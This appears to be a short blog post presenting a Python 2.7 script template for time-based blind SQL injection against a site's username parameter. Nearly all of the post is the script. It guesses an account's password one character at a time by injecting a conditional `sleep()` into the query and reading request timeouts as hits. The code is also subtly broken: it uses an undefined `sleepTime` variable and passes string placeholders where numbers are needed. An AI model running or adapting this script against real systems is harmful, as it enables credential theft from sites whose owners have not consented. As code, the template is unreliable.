Cracking Tools Ethical Hacking and Pentesting MySQL Python Scriptting Software Security

Very Simple Blind Sql Injection Python 2.7.x Script Template for Penetration Testers

Murat Kaya

 |  Feb 21, 2017

Do not forget change parameters with your own…

#Very Simplish Blind Sql Injection Script Template for Python 2.7.X
import requests

#Sample character set
characters = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'

#Sample target
target = 'CHANGE_ME_FIRST ex:www.abc.com'

#Sample parameters
username = 'CHANGE_ME_FIRST ex:admin'
password_length = 'CHANGE_ME_FIRST ex:12'
sqlSleepTime = 'CHANGE_ME_FIRST ex:5'
requestTimeOut = 'CHANGE_ME_FIRST ex:1'

r = requests.get(target)
if r.status_code != requests.codes.ok:
        raise ValueError('Sorry! We cannot connect the site...')
else:
        print 'Connection OK! We can go now...'

#FatalityPunction
def letBlind ():
    foundChars = ''
    for i in range(password_length):
        for c in characters:
            try:
                blindSql = '?username='+username+'" AND IF(password like BINARY "'+foundChars+c+'%",sleep('+sleepTime+'),null)"'
                r = requests.get(target+blindSql,timeout=requestTimeOut)
            except requests.exceptions.Timeout:
                foundChars += c
                print 'Found chars in password: ' + foundChars
                break
#Start show...
letBlind()